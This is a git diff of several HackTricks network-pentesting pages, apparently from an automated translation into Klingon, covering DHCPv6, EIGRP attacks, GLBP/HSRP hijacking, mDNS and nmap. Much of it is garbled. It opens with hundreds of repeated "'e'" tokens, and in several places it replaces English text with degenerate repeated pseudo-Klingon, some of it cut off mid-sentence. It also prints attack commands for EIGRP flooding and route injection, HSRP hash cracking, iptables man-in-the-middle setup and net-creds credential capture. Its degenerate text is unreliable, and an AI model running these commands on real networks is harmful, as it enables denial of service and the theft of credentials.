**'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'
|
||||
|
|
File diff suppressed because one or more lines are too long
|
@ -1,5 +1,3 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
@ -19,16 +17,16 @@ A comparative view of DHCPv6 and DHCPv4 message types is presented in the table
|
|||
|
||||
| DHCPv6 Message Type | DHCPv4 Message Type |
|
||||
|:-------------------|:-------------------|
|
||||
| Solicit (1) | DHCPDISCOVER |
|
||||
| Advertise (2) | DHCPOFFER |
|
||||
| Request (3), Renew (5), Rebind (6) | DHCPREQUEST |
|
||||
| Reply (7) | DHCPACK / DHCPNAK |
|
||||
| Release (8) | DHCPRELEASE |
|
||||
| Information-Request (11) | DHCPINFORM |
|
||||
| Decline (9) | DHCPDECLINE |
|
||||
| Confirm (4) | none |
|
||||
| Reconfigure (10) | DHCPFORCERENEW |
|
||||
| Relay-Forw (12), Relay-Reply (13) | none |
|
||||
| **Solicit (1)** | DHCPDISCOVER |
|
||||
| **Advertise (2)** | DHCPOFFER |
|
||||
| **Request (3), Renew (5), Rebind (6)** | DHCPREQUEST |
|
||||
| **Reply (7)** | DHCPACK / DHCPNAK |
|
||||
| **Release (8)** | DHCPRELEASE |
|
||||
| **Information-Request (11)** | DHCPINFORM |
|
||||
| **Decline (9)** | DHCPDECLINE |
|
||||
| **Confirm (4)** | none |
|
||||
| **Reconfigure (10)** | DHCPFORCERENEW |
|
||||
| **Relay-Forw (12), Relay-Reply (13)** | none |
|
||||
|
||||
**Detailed Explanation of DHCPv6 Message Types:**
|
||||
|
||||
|
@ -63,5 +61,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -17,63 +17,63 @@ Other ways to support HackTricks:
|
|||
**This is a summary of the attacks exposed in** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9). Check it for further information.
|
||||
|
||||
## **Fake EIGRP Neighbors Attack**
|
||||
|
||||
|
||||
- **Objective**: To overload router CPUs by flooding them with EIGRP hello packets, potentially leading to a Denial of Service (DoS) attack.
|
||||
- **Tool**: **helloflooding.py** script.
|
||||
- **Execution**:
|
||||
%%%bash
|
||||
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
|
||||
%%%
|
||||
%%%bash
|
||||
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
|
||||
%%%
|
||||
- **Parameters**:
|
||||
- `--interface`: Specifies the network interface, e.g., `eth0`.
|
||||
- `--as`: Defines the EIGRP autonomous system number, e.g., `1`.
|
||||
- `--subnet`: Sets the subnet location, e.g., `10.10.100.0/24`.
|
||||
- `--interface`: Specifies the network interface, e.g., `eth0`.
|
||||
- `--as`: Defines the EIGRP autonomous system number, e.g., `1`.
|
||||
- `--subnet`: Sets the subnet location, e.g., `10.10.100.0/24`.
|
||||
|
||||
## **EIGRP Blackhole Attack**
|
||||
|
||||
- **Objective**: To disrupt network traffic flow by injecting a false route, leading to a blackhole where the traffic is directed to a non-existent destination.
|
||||
- **Tool**: **routeinject.py** script.
|
||||
- **Execution**:
|
||||
%%%bash
|
||||
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
|
||||
%%%
|
||||
%%%bash
|
||||
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
|
||||
%%%
|
||||
- **Parameters**:
|
||||
- `--interface`: Specifies the attacker’s system interface.
|
||||
- `--as`: Defines the EIGRP AS number.
|
||||
- `--src`: Sets the attacker’s IP address.
|
||||
- `--dst`: Sets the target subnet IP.
|
||||
- `--prefix`: Defines the mask of the target subnet IP.
|
||||
- `--interface`: Specifies the attacker’s system interface.
|
||||
- `--as`: Defines the EIGRP AS number.
|
||||
- `--src`: Sets the attacker’s IP address.
|
||||
- `--dst`: Sets the target subnet IP.
|
||||
- `--prefix`: Defines the mask of the target subnet IP.
|
||||
|
||||
## **Abusing K-Values Attack**
|
||||
|
||||
- **Objective**: To create continuous disruptions and reconnections within the EIGRP domain by injecting altered K-values, effectively resulting in a DoS attack.
|
||||
- **Tool**: **relationshipnightmare.py** script.
|
||||
- **Execution**:
|
||||
%%%bash
|
||||
~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
|
||||
%%%
|
||||
%%%bash
|
||||
~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
|
||||
%%%
|
||||
- **Parameters**:
|
||||
- `--interface`: Specifies the network interface.
|
||||
- `--as`: Defines the EIGRP AS number.
|
||||
- `--src`: Sets the IP Address of a legitimate router.
|
||||
- `--interface`: Specifies the network interface.
|
||||
- `--as`: Defines the EIGRP AS number.
|
||||
- `--src`: Sets the IP Address of a legitimate router.
|
||||
|
||||
## **Routing Table Overflow Attack**
|
||||
|
||||
- **Objective**: To strain the router's CPU and RAM by flooding the routing table with numerous false routes.
|
||||
- **Tool**: **routingtableoverflow.py** script.
|
||||
- **Execution**:
|
||||
%%%bash
|
||||
sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
|
||||
%%%
|
||||
%%%bash
|
||||
sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
|
||||
%%%
|
||||
- **Parameters**:
|
||||
- `--interface`: Specifies the network interface.
|
||||
- `--as`: Defines the EIGRP AS number.
|
||||
- `--src`: Sets the attacker’s IP address.
|
||||
- `--interface`: Specifies the network interface.
|
||||
- `--as`: Defines the EIGRP AS number.
|
||||
- `--src`: Sets the attacker’s IP address.
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -57,7 +57,6 @@ Attack Steps:
|
|||
By following these steps, the attacker positions themselves as a "man in the middle," capable of intercepting and analyzing network traffic, including unencrypted or sensitive data.
|
||||
|
||||
For demonstration, here are the required command snippets:
|
||||
|
||||
```bash
|
||||
# Enable promiscuous mode and IP forwarding
|
||||
sudo ip link set eth0 promisc on
|
||||
|
@ -71,82 +70,7 @@ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
|
|||
sudo route del default
|
||||
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
|
||||
```
|
||||
|
||||
Monitoring and intercepting traffic can be done using net-creds.py or similar tools to capture and analyze data flowing through the compromised network.
|
||||
|
||||
### Passive Explanation of HSRP Hijacking with Command Details
|
||||
### HSRP Hijacking with Command Details
|
||||
|
||||
#### Overview of HSRP (Hot Standby Router/Redundancy Protocol)
|
||||
HSRP is a Cisco proprietary protocol designed for network gateway redundancy. It allows the configuration of multiple physical routers into a single logical unit with a shared IP address. This logical unit is managed by a primary router responsible for directing traffic. Unlike GLBP, which uses metrics like priority and weight for load balancing, HSRP relies on a single active router for traffic management.
|
||||
|
||||
#### Roles and Terminology in HSRP
|
||||
- **HSRP Active Router**: The device acting as the gateway, managing traffic flow.
|
||||
- **HSRP Standby Router**: A backup router, ready to take over if the active router fails.
|
||||
- **HSRP Group**: A set of routers collaborating to form a single resilient virtual router.
|
||||
- **HSRP MAC Address**: A virtual MAC address assigned to the logical router in the HSRP setup.
|
||||
- **HSRP Virtual IP Address**: The virtual IP address of the HSRP group, acting as the default gateway for connected devices.
|
||||
|
||||
#### HSRP Versions
|
||||
HSRP comes in two versions, HSRPv1 and HSRPv2, differing mainly in group capacity, multicast IP usage, and virtual MAC address structure. The protocol utilizes specific multicast IP addresses for service information exchange, with Hello packets sent every 3 seconds. A router is presumed inactive if no packet is received within a 10-second interval.
|
||||
|
||||
#### HSRP Attack Mechanism
|
||||
HSRP attacks involve forcibly taking over the Active Router's role by injecting a maximum priority value. This can lead to a Man-In-The-Middle (MITM) attack. Essential pre-attack steps include gathering data about the HSRP setup, which can be done using Wireshark for traffic analysis.
|
||||
|
||||
#### Steps for Bypassing HSRP Authentication
|
||||
1. Save the network traffic containing HSRP data as a .pcap file.
|
||||
```shell
|
||||
tcpdump -w hsrp_traffic.pcap
|
||||
```
|
||||
2. Extract MD5 hashes from the .pcap file using hsrp2john.py.
|
||||
```shell
|
||||
python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes
|
||||
```
|
||||
3. Crack the MD5 hashes using John the Ripper.
|
||||
```shell
|
||||
john --wordlist=mywordlist.txt hsrp_hashes
|
||||
```
|
||||
|
||||
**Executing HSRP Injection with Loki**
|
||||
|
||||
1. Launch Loki to identify HSRP advertisements.
|
||||
2. Set the network interface to promiscuous mode and enable IP forwarding.
|
||||
```shell
|
||||
sudo ip link set eth0 promisc on
|
||||
sudo sysctl -w net.ipv4.ip_forward=1
|
||||
```
|
||||
3. Use Loki to target the specific router, input the cracked HSRP password, and perform necessary configurations to impersonate the Active Router.
|
||||
4. After gaining the Active Router role, configure your network interface and IP tables to intercept the legitimate traffic.
|
||||
```shell
|
||||
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
|
||||
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
|
||||
```
|
||||
5. Modify the routing table to route traffic through the former Active Router.
|
||||
```shell
|
||||
sudo route del default
|
||||
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
|
||||
```
|
||||
6. Use net-creds.py or a similar utility to capture credentials from the intercepted traffic.
|
||||
```shell
|
||||
sudo python2 net-creds.py -i eth0
|
||||
```
|
||||
|
||||
Executing these steps places the attacker in a position to intercept and manipulate traffic, similar to the procedure for GLBP hijacking. This highlights the vulnerability in redundancy protocols like HSRP and the need for robust security measures.
|
||||
|
||||
|
||||
## References
|
||||
- [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
HSRP (Hot Standby Router/Redundancy Protocol) jatlh Cisco proprietary protocol Hoch network gateway redundancy laH. 'oH multiple physical routers configuration 'ej shared IP address vItlhutlh. vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' v
|
||||
|
|
|
@ -1,8 +1,6 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -60,7 +58,7 @@ Or maybe, 2 packets with the same offset comes and the host has to decide which
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -71,5 +69,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
File diff suppressed because one or more lines are too long
|
@ -1,5 +1,3 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
@ -23,10 +21,10 @@ Key points to note:
|
|||
- **Domain Name Relinquishment**: A host can release its domain name by sending a packet with a TTL of zero.
|
||||
- **Usage Restriction**: mDNS typically resolves names ending in **.local** only. Conflicts with non-mDNS hosts in this domain require network configuration adjustments.
|
||||
- **Networking Details**:
|
||||
- Ethernet multicast MAC addresses: IPv4 - `01:00:5E:00:00:FB`, IPv6 - `33:33:00:00:00:FB`.
|
||||
- IP addresses: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb`.
|
||||
- Operates over UDP port 5353.
|
||||
- mDNS queries are confined to the local network and do not cross routers.
|
||||
- Ethernet multicast MAC addresses: IPv4 - `01:00:5E:00:00:FB`, IPv6 - `33:33:00:00:00:FB`.
|
||||
- IP addresses: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb`.
|
||||
- Operates over UDP port 5353.
|
||||
- mDNS queries are confined to the local network and do not cross routers.
|
||||
|
||||
## DNS-SD (Service Discovery)
|
||||
|
||||
|
@ -74,5 +72,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -13,11 +13,9 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
```
|
||||
nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24
|
||||
```
|
||||
|
||||
## Parameters
|
||||
|
||||
### IPs to scan
|
||||
|
@ -68,37 +66,36 @@ By default Nmap launches a discovery phase consisting of: `-PA80 -PS443 -PE -PP`
|
|||
|
||||
**-O** Deteccion de os
|
||||
|
||||
**--osscan-limit** Para escanear bien un host se necesita que al menos haya 1 puerto abierto y otro cerrado, si no se da esta condición y hemos puesto esto, no intenta hacer predicción de os (ahorra tiempo)
|
||||
|
||||
**--osscan-guess** Cuando la detección de os no es perfecta esto hace que se esfuerce más
|
||||
**--osscan-limit** Para escanear bien un host se necesita que al menos haya 1 puerto abierto y otro cerrado, si no se
|
||||
**--osscan-guess** QaStaHvIS 'ej Dalo'Ha' 'e' vItlhutlh
|
||||
|
||||
**Scripts**
|
||||
|
||||
\--script _\<filename>_|_\<category>_|_\<directory>_|_\<expression>_\[,...]
|
||||
|
||||
Para usar los de por efecto vale con -sC o --script=default
|
||||
ghItlh ScriptmeyDaq -sC be' 'ej --script=default
|
||||
|
||||
Los tipos que hay son de: auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, and vuln
|
||||
auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, 'ej vuln DaH jImej
|
||||
|
||||
* **Auth:** ejecuta todos sus _scripts_ disponibles para autenticación
|
||||
* **Default:** ejecuta los _scripts_ básicos por defecto de la herramienta
|
||||
* **Discovery:** recupera información del _target_ o víctima
|
||||
* **External:** _script_ para utilizar recursos externos
|
||||
* **Intrusive:** utiliza _scripts_ que son considerados intrusivos para la víctima o _target_
|
||||
* **Malware:** revisa si hay conexiones abiertas por códigos maliciosos o _backdoors_ (puertas traseras)
|
||||
* **Safe:** ejecuta _scripts_ que no son intrusivos
|
||||
* **Vuln:** descubre las vulnerabilidades más conocidas
|
||||
* **All:** ejecuta absolutamente todos los _scripts_ con extensión NSE disponibles
|
||||
* **Auth:** authentication laH scriptmeyDaq cha'logh
|
||||
* **Default:** nmap DaH scriptmeyDaq pagh
|
||||
* **Discovery:** target vItlhutlh vItlhutlh
|
||||
* **External:** scriptmeyDaq vItlhutlh
|
||||
* **Intrusive:** target vItlhutlh scriptmeyDaq
|
||||
* **Malware:** malware 'ej 'oH 'ej backdoors vItlhutlh
|
||||
* **Safe:** scriptmeyDaq vItlhutlh
|
||||
* **Vuln:** vuln vItlhutlh
|
||||
* **All:** nmap DaH scriptmeyDaq NSE DaH pagh
|
||||
|
||||
Para buscar scripts:
|
||||
ScriptmeyDaq vItlhutlh:
|
||||
|
||||
**nmap --script-help="http-\*" -> Los que empiecen por http-**
|
||||
**nmap --script-help="http-\*" -> http- vItlhutlh**
|
||||
|
||||
